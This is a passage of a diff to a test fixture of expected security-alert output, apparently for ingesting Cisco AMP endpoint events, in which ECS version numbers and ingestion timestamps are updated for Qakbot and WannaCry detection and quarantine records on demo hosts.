Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -942,7 +942,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -962,7 +962,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500149522Z", + "ingested": "2021-09-13T18:07:28.111156357Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1017,7 +1017,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1037,7 +1037,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500151606Z", + "ingested": "2021-09-13T18:07:28.111158472Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1092,7 +1092,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1112,7 +1112,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500153674Z", + "ingested": "2021-09-13T18:07:28.111160543Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1167,7 +1167,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1187,7 +1187,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500155748Z", + "ingested": "2021-09-13T18:07:28.111162637Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -1240,7 +1240,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1264,7 +1264,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500157824Z", + "ingested": "2021-09-13T18:07:28.111164728Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1321,7 +1321,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1347,7 +1347,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500160068Z", + "ingested": "2021-09-13T18:07:28.111166874Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1402,7 +1402,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1426,7 +1426,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500162155Z", + "ingested": "2021-09-13T18:07:28.111168956Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1481,7 +1481,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1505,7 +1505,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500164235Z", + "ingested": "2021-09-13T18:07:28.111171040Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1558,7 +1558,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1578,7 +1578,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500166300Z", + "ingested": "2021-09-13T18:07:28.111173128Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1633,7 +1633,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1653,7 +1653,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500168364Z", + "ingested": "2021-09-13T18:07:28.111175203Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -1708,7 +1708,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1734,7 +1734,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500170457Z", + "ingested": "2021-09-13T18:07:28.111177282Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1791,7 +1791,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1817,7 +1817,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500172540Z", + "ingested": "2021-09-13T18:07:28.111179351Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1870,7 +1870,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1890,7 +1890,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500174721Z", + "ingested": "2021-09-13T18:07:28.111181571Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1945,7 +1945,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1965,7 +1965,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500176777Z", + "ingested": "2021-09-13T18:07:28.111183666Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2020,7 +2020,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2040,7 +2040,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500178843Z", + "ingested": "2021-09-13T18:07:28.111185734Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2097,7 +2097,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2121,7 +2121,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500180907Z", + "ingested": "2021-09-13T18:07:28.111187851Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective 